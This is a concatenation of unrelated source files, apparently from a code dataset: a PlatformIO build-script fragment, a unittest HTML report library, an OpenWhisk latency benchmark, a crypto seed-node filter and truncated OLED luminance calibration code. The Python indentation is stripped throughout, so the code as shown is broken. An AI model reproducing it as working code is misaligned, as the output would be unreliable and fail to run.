env.Tool("compilation_db")
if not os.path.isdir(env.subst("$BUILD_DIR")):
os.makedirs(env.subst("$BUILD_DIR"))
env.LoadProjectOptions()
env.LoadPioPlatform()
env.SConscriptChdir(0)
env.SConsignFile(
os.path.join(
"$BUILD_DIR", ".sconsign%d%d" % (sys.version_info[0], sys.version_info[1])
)
)
for item in env.GetExtraScripts("pre"):
env.SConscript(item, exports="env")
env.SConscript("$BUILD_SCRIPT")
if "UPLOAD_FLAGS" in env:
env.Prepend(UPLOADERFLAGS=["$UPLOAD_FLAGS"])
if env.GetProjectOption("upload_command"):
env.Replace(UPLOADCMD=env.GetProjectOption("upload_command"))
for item in env.GetExtraScripts("post"):
env.SConscript(item, exports="env")
##############################################################################
# Checking program size
if env.get("SIZETOOL") and not (
set(["nobuild", "sizedata"]) & set(COMMAND_LINE_TARGETS)
):
env.Depends(["upload", "program"], "checkprogsize")
# Replace platform's "size" target with our
_new_targets = [t for t in DEFAULT_TARGETS if str(t) != "size"]
Default(None)
Default(_new_targets)
Default("checkprogsize")
if "compiledb" in COMMAND_LINE_TARGETS:
env.Alias("compiledb", env.CompilationDatabase("$COMPILATIONDB_PATH"))
# Print configured protocols
env.AddPreAction(
["upload", "program"],
env.VerboseAction(
lambda source, target, env: env.PrintUploadInfo(),
"Configuring upload protocol...",
),
)
AlwaysBuild(env.Alias("__debug", DEFAULT_TARGETS))
AlwaysBuild(env.Alias("__test", DEFAULT_TARGETS))
##############################################################################
if "envdump" in COMMAND_LINE_TARGETS:
click.echo(env.Dump())
env.Exit(0)
if set(["_idedata", "idedata"]) & set(COMMAND_LINE_TARGETS):
try:
Import("projenv")
except: # pylint: disable=bare-except
projenv = env
data = projenv.DumpIDEData(env)
# dump to file for the further reading by project.helpers.load_project_ide_data
with open(
projenv.subst(os.path.join("$BUILD_DIR", "idedata.json")),
mode="w",
encoding="utf8",
) as fp:
json.dump(data, fp)
click.echo("\n%s\n" % json.dumps(data)) # pylint: disable=undefined-variable
env.Exit(0)
if "sizedata" in COMMAND_LINE_TARGETS:
AlwaysBuild(
env.Alias(
"sizedata",
DEFAULT_TARGETS,
env.VerboseAction(env.DumpSizeData, "Generating memory usage report..."),
)
)
Default("sizedata")
|
the-stack_106_23303 | """
@Version: 1.0
@Project: BeautyReport
@Author: Raymond
@Date: 2017/11/15 5:28 PM
@File: __init__.py.py
@License: MIT
"""
import os
import sys
from io import StringIO as StringIO
import time
import json
import unittest
import platform
import base64
from distutils.sysconfig import get_python_lib
import traceback
from functools import wraps
__all__ = ['BeautifulReport']
HTML_IMG_TEMPLATE = """
<a href="data:image/png;base64, {}">
<img src="data:image/png;base64, {}" width="800px" height="500px"/>
</a>
<br></br>
"""
class OutputRedirector(object):
""" Wrapper to redirect stdout or stderr """
def __init__(self, fp):
self.fp = fp
def write(self, s):
self.fp.write(s)
def writelines(self, lines):
self.fp.writelines(lines)
def flush(self):
self.fp.flush()
stdout_redirector = OutputRedirector(sys.stdout)
stderr_redirector = OutputRedirector(sys.stderr)
SYSSTR = platform.system()
SITE_PAKAGE_PATH = get_python_lib()
FIELDS = {
"testPass": 0,
"testResult": [
],
"testName": "",
"testAll": 0,
"testFail": 0,
"beginTime": "",
"totalTime": "",
"testSkip": 0
}
class PATH:
""" all file PATH meta """
config_tmp_path = SITE_PAKAGE_PATH + '/BeautifulReport/template/template'
class MakeResultJson:
""" make html table tags """
def __init__(self, datas: tuple):
"""
        Initialize the object.
        :param datas: tuple containing all returned result data for one test case
"""
self.datas = datas
self.result_schema = {}
def __setitem__(self, key, value):
"""
:param key: self[key]
:param value: value
:return:
"""
        self.result_schema[key] = value
def __repr__(self) -> str:
"""
        Return the object's JSON representation.
        :rtype: str
        :return: the repr of self, a fully built result record serialized as JSON
"""
keys = (
'className',
'methodName',
'description',
'spendTime',
'status',
'log',
)
for key, data in zip(keys, self.datas):
self.result_schema.setdefault(key, data)
return json.dumps(self.result_schema)
class ReportTestResult(unittest.TestResult):
""" override"""
def __init__(self, suite, stream=sys.stdout):
""" pass """
super(ReportTestResult, self).__init__()
self.begin_time = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
self.start_time = 0
self.stream = stream
self.end_time = 0
self.failure_count = 0
self.error_count = 0
self.success_count = 0
self.skipped = 0
self.verbosity = 1
self.success_case_info = []
self.skipped_case_info = []
self.failures_case_info = []
self.errors_case_info = []
self.all_case_counter = 0
self.suite = suite
self.status = ''
self.result_list = []
self.case_log = ''
self.default_report_name = 'Automated test report'
self.FIELDS = None
self.sys_stdout = None
self.sys_stderr = None
self.outputBuffer = None
@property
def success_counter(self) -> int:
""" set success counter """
return self.success_count
@success_counter.setter
def success_counter(self, value) -> None:
"""
        Setter for success_counter, used to update the number of successful cases
        :param value: the new success count as an int
:return:
"""
self.success_count = value
def startTest(self, test) -> None:
"""
        Called when a test case is about to run
:return:
"""
unittest.TestResult.startTest(self, test)
self.outputBuffer = StringIO()
stdout_redirector.fp = self.outputBuffer
stderr_redirector.fp = self.outputBuffer
self.sys_stdout = sys.stdout
        self.sys_stderr = sys.stderr
sys.stdout = stdout_redirector
sys.stderr = stderr_redirector
self.start_time = time.time()
def stopTest(self, test) -> None:
"""
        Called after a test case has finished running
:return:
"""
self.end_time = '{0:.3} s'.format((time.time() - self.start_time))
self.result_list.append(self.get_all_result_info_tuple(test))
self.complete_output()
def complete_output(self):
"""
Disconnect output redirection and return buffer.
Safe to call multiple times.
"""
if self.sys_stdout:
sys.stdout = self.sys_stdout
            sys.stderr = self.sys_stderr
            self.sys_stdout = None
            self.sys_stderr = None
return self.outputBuffer.getvalue()
def stopTestRun(self, title=None) -> dict:
"""
        Called after all tests have finished running
:param title:
:return:
"""
FIELDS['testPass'] = self.success_counter
for item in self.result_list:
item = json.loads(str(MakeResultJson(item)))
FIELDS.get('testResult').append(item)
FIELDS['testAll'] = len(self.result_list)
FIELDS['testName'] = title if title else self.default_report_name
FIELDS['testFail'] = self.failure_count
FIELDS['beginTime'] = self.begin_time
end_time = int(time.time())
start_time = int(time.mktime(time.strptime(self.begin_time, '%Y-%m-%d %H:%M:%S')))
FIELDS['totalTime'] = str(end_time - start_time) + 's'
FIELDS['testError'] = self.error_count
FIELDS['testSkip'] = self.skipped
self.FIELDS = FIELDS
return FIELDS
def get_all_result_info_tuple(self, test) -> tuple:
"""
        Collect the information related to a test and return it as a complete tuple
:param test:
:return:
"""
return tuple([*self.get_testcase_property(test), self.end_time, self.status, self.case_log])
@staticmethod
    def error_or_failure_text(err) -> list:
        """
        Take the sys.exc_info() tuple and return the formatted traceback lines
:param err:
:return:
"""
return traceback.format_exception(*err)
def addSuccess(self, test) -> None:
"""
        Record a successful test case
:param test:
:return:
"""
logs = []
output = self.complete_output()
logs.append(output)
if self.verbosity > 1:
sys.stderr.write('ok ')
sys.stderr.write(str(test))
sys.stderr.write('\n')
else:
sys.stderr.write('.')
self.success_counter += 1
self.status = 'Success'
self.case_log = output.split('\n')
self._mirrorOutput = True # print(class_name, method_name, method_doc)
def addError(self, test, err):
"""
        Add an error result and its logs
:param test:
:param err:
:return:
"""
logs = []
output = self.complete_output()
logs.append(output)
logs.extend(self.error_or_failure_text(err))
        self.error_count += 1  # count errors separately from assertion failures
self.add_test_type('Fail', logs)
if self.verbosity > 1:
sys.stderr.write('F ')
sys.stderr.write(str(test))
sys.stderr.write('\n')
else:
sys.stderr.write('F')
self._mirrorOutput = True
def addFailure(self, test, err):
"""
        Add a failure result and its logs
:param test:
:param err:
:return:
"""
logs = []
output = self.complete_output()
logs.append(output)
logs.extend(self.error_or_failure_text(err))
self.failure_count += 1
self.add_test_type('Fail', logs)
if self.verbosity > 1:
sys.stderr.write('F ')
sys.stderr.write(str(test))
sys.stderr.write('\n')
else:
sys.stderr.write('F')
self._mirrorOutput = True
def addSkip(self, test, reason) -> None:
"""
        Record the information of a skipped case
:param test:
:param reason:
:return: None
"""
logs = [reason]
self.complete_output()
self.skipped += 1
self.add_test_type('Skipped', logs)
if self.verbosity > 1:
sys.stderr.write('S ')
sys.stderr.write(str(test))
sys.stderr.write('\n')
else:
sys.stderr.write('S')
self._mirrorOutput = True
def add_test_type(self, status: str, case_log: list) -> None:
"""
        Set the status and case log for the current test
:param status:
:param case_log:
:return:
"""
self.status = status
self.case_log = case_log
@staticmethod
def get_testcase_property(test) -> tuple:
"""
        Take a test and return its class_name, method_name and method_doc attributes
:param test:
:return: (class_name, method_name, method_doc) -> tuple
"""
class_name = test.__class__.__qualname__
method_name = test.__dict__['_testMethodName']
method_doc = test.__dict__['_testMethodDoc']
return class_name, method_name, method_doc
class BeautifulReport(ReportTestResult, PATH):
img_path = 'img/' if platform.system() != 'Windows' else 'img\\'
def __init__(self, suites):
super(BeautifulReport, self).__init__(suites)
self.suites = suites
self.log_path = None
self.title = 'Automated test report'
self.filename = 'report.html'
def report(self, description, filename: str = None, log_path='.'):
"""
        Generate the test report and store it under the given path
        :param log_path: directory in which the report file is stored
        :param filename: name of the generated report file
        :param description: title/description shown in the report
:return:
"""
if filename:
self.filename = filename if filename.endswith('.html') else filename + '.html'
if description:
self.title = description
self.log_path = os.path.abspath(log_path)
self.suites.run(result=self)
self.stopTestRun(self.title)
self.output_report()
text = '\nAll test ran, please check the report in {}'.format(self.log_path)
print(text)
def output_report(self):
"""
        Write the test report to the configured path
:return:
"""
template_path = self.config_tmp_path
override_path = os.path.abspath(self.log_path) if \
os.path.abspath(self.log_path).endswith('/') else \
os.path.abspath(self.log_path) + '/'
with open(template_path, 'rb') as file:
body = file.readlines()
with open(override_path + self.filename, 'wb') as write_file:
for item in body:
if item.strip().startswith(b'var resultData'):
head = ' var resultData = '
item = item.decode().split(head)
item[1] = head + json.dumps(self.FIELDS, ensure_ascii=False, indent=4)
item = ''.join(item).encode()
item = bytes(item) + b';\n'
write_file.write(item)
@staticmethod
def img2base(img_path: str, file_name: str) -> str:
"""
        Locate the image file with the given name and return it base64 encoded
        :param img_path: absolute path of the image directory
        :param file_name: file name passed in through the decorator
:return:
"""
        pattern = '/' if platform.system() != 'Windows' else '\\'
with open(img_path + pattern + file_name, 'rb') as file:
data = file.read()
return base64.b64encode(data).decode()
def add_test_img(*pargs):
"""
    Accept one or more image names and embed the corresponding images in the test report
:param pargs:
:return:
"""
def _wrap(func):
@wraps(func)
def __wrap(*args, **kwargs):
img_path = os.path.abspath('{}'.format(BeautifulReport.img_path))
try:
result = func(*args, **kwargs)
except Exception:
if 'save_img' in dir(args[0]):
save_img = getattr(args[0], 'save_img')
save_img(func.__name__)
data = BeautifulReport.img2base(img_path, pargs[0] + '.png')
print(HTML_IMG_TEMPLATE.format(data, data))
sys.exit(0)
print('<br></br>')
if len(pargs) > 1:
for parg in pargs:
print(parg + ':')
data = BeautifulReport.img2base(img_path, parg + '.png')
print(HTML_IMG_TEMPLATE.format(data, data))
return result
            if not os.path.exists(os.path.join(img_path, pargs[0] + '.png')):
return result
data = BeautifulReport.img2base(img_path, pargs[0] + '.png')
print(HTML_IMG_TEMPLATE.format(data, data))
return result
return __wrap
return _wrap
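# ---------------------------------------------------------------------------
# Usage sketch (illustrative addition, not part of the original library):
# discover a unittest suite and render it with BeautifulReport. The test
# directory './tests' and the report file name below are assumptions; adjust
# them to the actual project layout.
if __name__ == '__main__':
    example_suite = unittest.defaultTestLoader.discover('./tests', pattern='test_*.py')
    BeautifulReport(example_suite).report(
        description='Example report',
        filename='example_report.html',
        log_path='.',
    )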
|
the-stack_106_23305 | import os
import threading
import time
import sys, getopt
def client(i,results,loopTimes):
print("client %d start" %i)
command = "./single-cold_warm.sh -R -t " + str(loopTimes)
r = os.popen(command)
text = r.read()
results[i] = text
print("client %d finished" %i)
def warmup(i,warmupTimes,actionName,params):
for j in range(warmupTimes):
r = os.popen("wsk -i action invoke %s %s --result --blocking" %(actionName,params))
text = r.read()
print("client %d warmup finished" %i)
def main():
argv = getargv()
clientNum = argv[0]
loopTimes = argv[1]
warmupTimes = argv[2]
threads = []
containerName = "hellonodejs"
actionName = "hello-nodejs"
params = ""
r = os.popen("docker stop `docker ps | grep %s | awk {'print $1'}`" %containerName)
r.read()
# First: warm up
for i in range(clientNum):
t = threading.Thread(target=warmup,args=(i,warmupTimes,actionName,params))
threads.append(t)
for i in range(clientNum):
threads[i].start()
for i in range(clientNum):
threads[i].join()
print("Warm up complete")
# Second: invoke the actions
# Initialize the results and the clients
threads = []
results = []
for i in range(clientNum):
results.append('')
# Create the clients
for i in range(clientNum):
t = threading.Thread(target=client,args=(i,results,loopTimes))
threads.append(t)
# start the clients
for i in range(clientNum):
threads[i].start()
for i in range(clientNum):
threads[i].join()
outfile = open("result.csv","w")
outfile.write("invokeTime,startTime,endTime\n")
latencies = []
minInvokeTime = 0x7fffffffffffffff
maxEndTime = 0
for i in range(clientNum):
# get and parse the result of a client
clientResult = parseResult(results[i])
# print the result of every loop of the client
for j in range(len(clientResult)):
outfile.write(clientResult[j][0] + ',' + clientResult[j][1] + \
',' + clientResult[j][2] + '\n')
# Collect the latency
latency = int(clientResult[j][-1]) - int(clientResult[j][0])
latencies.append(latency)
# Find the first invoked action and the last return one.
if int(clientResult[j][0]) < minInvokeTime:
minInvokeTime = int(clientResult[j][0])
if int(clientResult[j][-1]) > maxEndTime:
maxEndTime = int(clientResult[j][-1])
formatResult(latencies,maxEndTime - minInvokeTime, clientNum, loopTimes, warmupTimes)
def parseResult(result):
lines = result.split('\n')
parsedResults = []
for line in lines:
if line.find("invokeTime") == -1:
continue
parsedTimes = ['','','']
i = 0
count = 0
while count < 3:
while i < len(line):
if line[i].isdigit():
parsedTimes[count] = line[i:i+13]
i += 13
count += 1
continue
i += 1
parsedResults.append(parsedTimes)
return parsedResults
def getargv():
if len(sys.argv) != 3 and len(sys.argv) != 4:
print("Usage: python3 run.py <client number> <loop times> [<warm up times>]")
exit(0)
if not str.isdigit(sys.argv[1]) or not str.isdigit(sys.argv[2]) or int(sys.argv[1]) < 1 or int(sys.argv[2]) < 1:
print("Usage: python3 run.py <client number> <loop times> [<warm up times>]")
print("Client number and loop times must be an positive integer")
exit(0)
if len(sys.argv) == 4:
if not str.isdigit(sys.argv[3]) or int(sys.argv[3]) < 1:
print("Usage: python3 run.py <client number> <loop times> [<warm up times>]")
print("Warm up times must be an positive integer")
exit(0)
else:
return (int(sys.argv[1]),int(sys.argv[2]),1)
return (int(sys.argv[1]),int(sys.argv[2]),int(sys.argv[3]))
def formatResult(latencies,duration,client,loop,warmup):
requestNum = len(latencies)
latencies.sort()
duration = float(duration)
# calculate the average latency
total = 0
for latency in latencies:
total += latency
print("\n")
print("------------------ result ---------------------")
averageLatency = float(total) / requestNum
_50pcLatency = latencies[int(requestNum * 0.5) - 1]
_75pcLatency = latencies[int(requestNum * 0.75) - 1]
_90pcLatency = latencies[int(requestNum * 0.9) - 1]
_95pcLatency = latencies[int(requestNum * 0.95) - 1]
_99pcLatency = latencies[int(requestNum * 0.99) - 1]
print("latency (ms):\navg\t50%\t75%\t90%\t95%\t99%")
print("%.2f\t%d\t%d\t%d\t%d\t%d" %(averageLatency,_50pcLatency,_75pcLatency,_90pcLatency,_95pcLatency,_99pcLatency))
print("throughput (n/s):\n%.2f" %(requestNum / (duration/1000)))
# output result to file
resultfile = open("eval-result.log","a")
resultfile.write("\n\n------------------ (concurrent)result ---------------------\n")
resultfile.write("client: %d, loop_times: %d, warup_times: %d\n" % (client, loop, warmup))
resultfile.write("%d requests finished in %.2f seconds\n" %(requestNum, (duration/1000)))
resultfile.write("latency (ms):\navg\t50%\t75%\t90%\t95%\t99%\n")
resultfile.write("%.2f\t%d\t%d\t%d\t%d\t%d\n" %(averageLatency,_50pcLatency,_75pcLatency,_90pcLatency,_95pcLatency,_99pcLatency))
resultfile.write("throughput (n/s):\n%.2f\n" %(requestNum / (duration/1000)))
main()
|
the-stack_106_23307 | #!/usr/bin/env python3
# Copyright (c) 2013-2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Generate seeds.txt from Pieter's DNS seeder
#
NSEEDS=512
MAX_SEEDS_PER_ASN=2
MIN_BLOCKS = 615801
# These are hosts that have been observed to be behaving strangely (e.g.
# aggressively connecting to every node).
SUSPICIOUS_HOSTS = {
""
}
import re
import sys
import dns.resolver
import collections
PATTERN_IPV4 = re.compile(r"^((\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})):(\d+)$")
PATTERN_IPV6 = re.compile(r"^\[([0-9a-z:]+)\]:(\d+)$")
PATTERN_ONION = re.compile(r"^([abcdefghijklmnopqrstuvwxyz234567]{16}\.onion):(\d+)$")
PATTERN_AGENT = re.compile(r"^(/GastroCoinCoin:2.2.(0|1|99)/)$")
def parseline(line):
sline = line.split()
if len(sline) < 11:
return None
m = PATTERN_IPV4.match(sline[0])
sortkey = None
ip = None
if m is None:
m = PATTERN_IPV6.match(sline[0])
if m is None:
m = PATTERN_ONION.match(sline[0])
if m is None:
return None
else:
net = 'onion'
ipstr = sortkey = m.group(1)
port = int(m.group(2))
else:
net = 'ipv6'
if m.group(1) in ['::']: # Not interested in localhost
return None
ipstr = m.group(1)
sortkey = ipstr # XXX parse IPv6 into number, could use name_to_ipv6 from generate-seeds
port = int(m.group(2))
else:
# Do IPv4 sanity check
ip = 0
for i in range(0,4):
if int(m.group(i+2)) < 0 or int(m.group(i+2)) > 255:
return None
ip = ip + (int(m.group(i+2)) << (8*(3-i)))
if ip == 0:
return None
net = 'ipv4'
sortkey = ip
ipstr = m.group(1)
port = int(m.group(6))
# Skip bad results.
    if int(sline[1]) == 0:
return None
# Extract uptime %.
uptime30 = float(sline[7][:-1])
# Extract Unix timestamp of last success.
lastsuccess = int(sline[2])
# Extract protocol version.
version = int(sline[10])
# Extract user agent.
if len(sline) > 11:
agent = sline[11][1:] + sline[12][:-1]
else:
agent = sline[11][1:-1]
# Extract service flags.
service = int(sline[9], 16)
# Extract blocks.
blocks = int(sline[8])
# Construct result.
return {
'net': net,
'ip': ipstr,
'port': port,
'ipnum': ip,
'uptime': uptime30,
'lastsuccess': lastsuccess,
'version': version,
'agent': agent,
'service': service,
'blocks': blocks,
'sortkey': sortkey,
}
def filtermultiport(ips):
'''Filter out hosts with more nodes per IP'''
hist = collections.defaultdict(list)
for ip in ips:
hist[ip['sortkey']].append(ip)
return [value[0] for (key,value) in list(hist.items()) if len(value)==1]
# Based on Greg Maxwell's seed_filter.py
def filterbyasn(ips, max_per_asn, max_total):
# Sift out ips by type
ips_ipv4 = [ip for ip in ips if ip['net'] == 'ipv4']
ips_ipv6 = [ip for ip in ips if ip['net'] == 'ipv6']
ips_onion = [ip for ip in ips if ip['net'] == 'onion']
# Filter IPv4 by ASN
result = []
asn_count = {}
for ip in ips_ipv4:
if len(result) == max_total:
break
try:
asn = int([x.to_text() for x in dns.resolver.query('.'.join(reversed(ip['ip'].split('.'))) + '.origin.asn.cymru.com', 'TXT').response.answer][0].split('\"')[1].split(' ')[0])
if asn not in asn_count:
asn_count[asn] = 0
if asn_count[asn] == max_per_asn:
continue
asn_count[asn] += 1
result.append(ip)
except:
sys.stderr.write('ERR: Could not resolve ASN for "' + ip['ip'] + '"\n')
# TODO: filter IPv6 by ASN
# Add back non-IPv4
result.extend(ips_ipv6)
result.extend(ips_onion)
return result
def main():
lines = sys.stdin.readlines()
ips = [parseline(line) for line in lines]
    # Skip entries with an invalid address.
ips = [ip for ip in ips if ip is not None]
# Skip entries from suspicious hosts.
ips = [ip for ip in ips if ip['ip'] not in SUSPICIOUS_HOSTS]
# Enforce minimal number of blocks.
ips = [ip for ip in ips if ip['blocks'] >= MIN_BLOCKS]
# Require service bit 1.
ips = [ip for ip in ips if (ip['service'] & 1) == 1]
# Require at least 50% 30-day uptime.
ips = [ip for ip in ips if ip['uptime'] > 50]
# Require a known and recent user agent.
ips = [ip for ip in ips if PATTERN_AGENT.match(re.sub(' ', '-', ip['agent']))]
# Sort by availability (and use last success as tie breaker)
ips.sort(key=lambda x: (x['uptime'], x['lastsuccess'], x['ip']), reverse=True)
# Filter out hosts with multiple bitcoin ports, these are likely abusive
ips = filtermultiport(ips)
# Look up ASNs and limit results, both per ASN and globally.
ips = filterbyasn(ips, MAX_SEEDS_PER_ASN, NSEEDS)
# Sort the results by IP address (for deterministic output).
ips.sort(key=lambda x: (x['net'], x['sortkey']))
for ip in ips:
if ip['net'] == 'ipv6':
print('[%s]:%i' % (ip['ip'], ip['port']))
else:
print('%s:%i' % (ip['ip'], ip['port']))
if __name__ == '__main__':
main()
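# Typical invocation (an assumption based on how similar seed-filtering scripts
# are run): pipe the DNS seeder dump in on stdin and redirect the filtered list, e.g.
#   python3 makeseeds.py < seeds_main.txt > nodes_main.txt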
|
the-stack_106_23309 | # coding: utf-8
# General Modules
# import os, shutil
# import re, string
import os
import re
import math
import numpy as np
import pandas as pd
import datetime as dt
import copy
import scipy.constants as sc # natural constants
def read_calibration_files(
photopic_response_path,
pd_responsivity_path,
cie_reference_path,
spectrometer_calibration_path,
):
"""
Function that wraps reading in the calibration files and returns them as dataframes
"""
photopic_response = pd.read_csv(
# os.path.join(
# os.path.dirname(os.path.dirname(__file__)),
# "library",
# "Photopic_response.txt",
# ),
photopic_response_path,
sep="\t",
names=["wavelength", "photopic_response"],
)
pd_responsivity = pd.read_csv(
# os.path.join(
# os.path.dirname(os.path.dirname(__file__)), "library", "Responsivity_PD.txt"
# ),
pd_responsivity_path,
sep="\t",
names=["wavelength", "pd_responsivity"],
)
cie_reference = pd.read_csv(
# os.path.join(
# os.path.dirname(os.path.dirname(__file__)),
# "library",
# "NormCurves_400-800.txt",
# ),
cie_reference_path,
sep="\t",
names=["wavelength", "none", "x_cie", "y_cie", "z_cie"],
)
spectrometer_calibration = pd.read_csv(
# os.path.join(
# os.path.dirname(os.path.dirname(__file__)), "library", "CalibrationData.txt"
# ),
spectrometer_calibration_path,
sep="\t",
names=["wavelength", "sensitivity"],
)
# Only take the part of the calibration files that is in the range of the
# spectrometer calibration file. Otherwise all future interpolations will
# interpolate on data that does not exist. I think it doesn't make a
# difference because this kind of data is set to zero anyways by the
# interpolate function but it is more logic to get rid of the unwanted data
# here already
photopic_response_range = photopic_response.loc[
np.logical_and(
photopic_response["wavelength"]
<= spectrometer_calibration["wavelength"].max(),
photopic_response["wavelength"]
>= spectrometer_calibration["wavelength"].min(),
)
]
pd_responsivity_range = pd_responsivity.loc[
np.logical_and(
pd_responsivity["wavelength"]
<= spectrometer_calibration["wavelength"].max(),
pd_responsivity["wavelength"]
>= spectrometer_calibration["wavelength"].min(),
)
]
cie_reference_range = cie_reference.loc[
np.logical_and(
cie_reference["wavelength"] <= spectrometer_calibration["wavelength"].max(),
cie_reference["wavelength"] >= spectrometer_calibration["wavelength"].min(),
)
]
return (
photopic_response_range,
pd_responsivity_range,
cie_reference_range,
spectrometer_calibration,
)
def interpolate_spectrum(spectrum, photopic_response):
"""
Function that does the interpolation of a given pandas dataframe on the
photopic response calibration wavelengths. This is later needed for the
integrals.
"""
def interpolate(column):
"""
Helper function to do the numpy interpolate on an entire dataframe
"""
return np.interp(
photopic_response["wavelength"].to_numpy(),
spectrum["wavelength"].to_numpy(),
column,
)
# Now interpolate the entire dataframe on the wavelengths that are present in
# the photopic_response file
spectrum_interpolated_df = spectrum.apply(interpolate)
return spectrum_interpolated_df
def calibrate_spectrum(spectrum, calibration):
"""
Function that takes a pandas dataframe spectrum and corrects it according to
the calibration files
"""
# interpolate spectrometer calibration factor onto correct axis (so that it
# can be multiplied with the spectrum itself)
interpolated_calibration = np.interp(
spectrum["wavelength"].to_numpy(dtype=np.float),
calibration["wavelength"].to_numpy(dtype=np.float),
calibration["sensitivity"].to_numpy(dtype=np.float),
)
# Now subtract background and multiply with calibration
spectrum_corrected = (
spectrum.loc[:, ~np.isin(spectrum.columns, ["background", "wavelength"])]
.subtract(spectrum["background"], axis=0)
.multiply(interpolated_calibration, axis=0)
)
spectrum_corrected["wavelength"] = spectrum["wavelength"]
return spectrum_corrected
# Now interpolate and correct the spectrum
# spectrum_corrected = interpolate_and_correct_spectrum(spectrum)
#######################################################################################
######################## Only Angle Resolved Spectrum Related #########################
#######################################################################################
def calculate_ri(column):
"""
Function that calculates radiant intensity
"""
return float(sc.h * sc.c / 1e-9 * np.sum(column))
def calculate_li(column, photopic_response):
"""
Function that calculates the luminous intensity
Emission in terms of photometric response, so taking into account the
spectral shifts and sensitivity of the eye/photopic response
"""
return float(
sc.physical_constants["luminous efficacy"][0]
* sc.h
* sc.c
/ 1e-9
* np.sum(column * photopic_response["photopic_response"].to_numpy())
)
# ri = spectrum_corrected.drop(["0_deg", "wavelength"], axis=1).apply(
# calculate_ri, axis=0
# )
# li = spectrum_corrected.drop(["0_deg", "wavelength"], axis=1).apply(
# calculate_li, axis=0
# )
def calculate_e_correction(df):
"""
Closure to calculate the e correction factor from a dataframe
"""
# Get angles from column names first
try:
angles = df.drop(["0_deg", "wavelength"], axis=1).columns.to_numpy(float)
except:
angles = df.drop(["wavelength"], axis=1).columns.to_numpy(float)
def calculate_efactor(column):
"""
Function to calculate efactor, perp_intensity is just the intensity at 0°
"""
return sum(column * df["wavelength"]) / sum(df["0.0"] * df["wavelength"])
try:
e_factor = df.drop(["0_deg", "wavelength"], axis=1).apply(calculate_efactor)
except:
e_factor = df.drop(["wavelength"], axis=1).apply(calculate_efactor)
# It is now important to only integrate from 0 to 90° and not the entire spectrum
# It is probably smarter to pull this at some point up but this works.
relevant_e_factors = e_factor.loc[
np.logical_and(
np.array(e_factor.index).astype(float) >= 0,
np.array(e_factor.index).astype(float) <= 90,
)
]
relevant_angles = np.array(
e_factor.loc[
np.logical_and(
np.array(e_factor.index).astype(float) >= 0,
np.array(e_factor.index).astype(float) <= 90,
)
].index
).astype(float)
return np.sum(
relevant_e_factors
* np.sin(np.deg2rad(relevant_angles))
* np.deg2rad(np.diff(relevant_angles)[0])
)
def calculate_v_correction(df, photopic_response):
"""
    Closure to calculate the v correction factor from a dataframe
"""
# Get angles from column names first
try:
angles = df.drop(["0_deg", "wavelength"], axis=1).columns.to_numpy(float)
except:
angles = df.drop(["wavelength"], axis=1).columns.to_numpy(float)
def calculate_vfactor(column):
"""
Function to calculate the vfactor
"""
return sum(column * photopic_response["photopic_response"].to_numpy()) / sum(
df["0.0"] * photopic_response["photopic_response"].to_numpy()
)
try:
v_factor = df.drop(["0_deg", "wavelength"], axis=1).apply(calculate_vfactor)
except:
v_factor = df.drop(["wavelength"], axis=1).apply(calculate_vfactor)
# It is now important to only integrate from 0 to 90° and not the entire spectrum
# It is probably smarter to pull this at some point up but this works.
relevant_v_factor = v_factor.loc[
np.logical_and(
np.array(v_factor.index).astype(float) >= 0,
np.array(v_factor.index).astype(float) <= 90,
)
]
relevant_angles = np.array(
v_factor.loc[
np.logical_and(
np.array(v_factor.index).astype(float) >= 0,
np.array(v_factor.index).astype(float) <= 90,
)
].index
).astype(float)
return np.sum(
relevant_v_factor
* np.sin(np.deg2rad(relevant_angles))
* np.deg2rad(np.diff(relevant_angles)[0])
)
class JVLData:
"""
At this point I think it is easier to have a class that allows for easy
calculation of the characteristics
"""
def __init__(
self,
jvl_data,
perpendicular_spectrum,
photopic_response,
pd_responsivity,
cie_reference,
angle_resolved,
pixel_area,
pd_resistance,
pd_radius,
pd_distance,
pd_cutoff,
correction_factor=[],
):
"""
All data must be provided in SI units!
The calculated quantities are, however, directly in their final
(usual) units.
- voltage: volts
- current: mA
- current density: mA/cm2
- absolute current density: mA/cm2
- luminance: cd/m2
- eqe: %
- luminous_efficacy: lm/W
- current_efficiency: cd/A
- power density: mW/mm2
"""
self.pd_resistance = pd_resistance
self.pixel_area = pixel_area
# Taking into account finite size of PD
self.sqsinalpha = pd_radius ** 2 / (pd_distance ** 2 + pd_radius ** 2)
self.voltage = np.array(jvl_data["voltage"])
self.pd_voltage = np.array(jvl_data["pd_voltage"])
# All pd voltages that are below cutoff are now cut off and set to zero.
# This is done using a helper array to preserve the original data
self.pd_voltage_cutoff = copy.copy(self.pd_voltage)
self.pd_voltage_cutoff[self.pd_voltage_cutoff <= pd_cutoff] = 0
self.current = np.array(jvl_data["current"]) / 1000
# Current density directly in mA/cm^2
self.current_density = np.array(jvl_data["current"]) / (pixel_area * 1e4)
self.absolute_current_density = np.array(abs(self.current_density))
self.cie_coordinates = self.calculate_cie_coordinates(
perpendicular_spectrum,
cie_reference,
)
self.calculate_integrals(
perpendicular_spectrum,
photopic_response["photopic_response"],
pd_responsivity["pd_responsivity"],
)
if angle_resolved == True:
# Non lambertian case
e_coeff = self.calculate_non_lambertian_e_coeff()
v_coeff = self.calculate_non_lambertian_v_coeff()
self.eqe = self.calculate_non_lambertian_eqe(e_coeff, correction_factor[0])
self.luminance = self.calculate_non_lambertian_luminance(v_coeff)
self.luminous_efficacy = self.calculate_non_lambertian_luminous_efficacy(
v_coeff, correction_factor[1]
)
self.power_density = self.calculate_non_lambertian_power_density(
e_coeff, correction_factor[0]
)
else:
# Lambertian case
e_coeff = self.calculate_lambertian_e_coeff()
v_coeff = self.calculate_lambertian_v_coeff()
self.eqe = self.calculate_lambertian_eqe(e_coeff)
self.luminance = self.calculate_lambertian_luminance(v_coeff)
self.luminous_efficacy = self.calculate_lambertian_luminous_efficacy(
v_coeff
)
self.power_density = self.calculate_lambertian_power_density(e_coeff)
self.current_efficiency = self.calculate_current_efficiency()
def calculate_integrals(
self, perpendicular_spectrum, photopic_response, pd_responsivity
):
"""
Function that calculates the important integrals
"""
self.integral_1 = np.sum(
perpendicular_spectrum["intensity"] * perpendicular_spectrum["wavelength"]
)
# Integral2 = np.sum(perp_intensity)
self.integral_2 = np.sum(perpendicular_spectrum["intensity"])
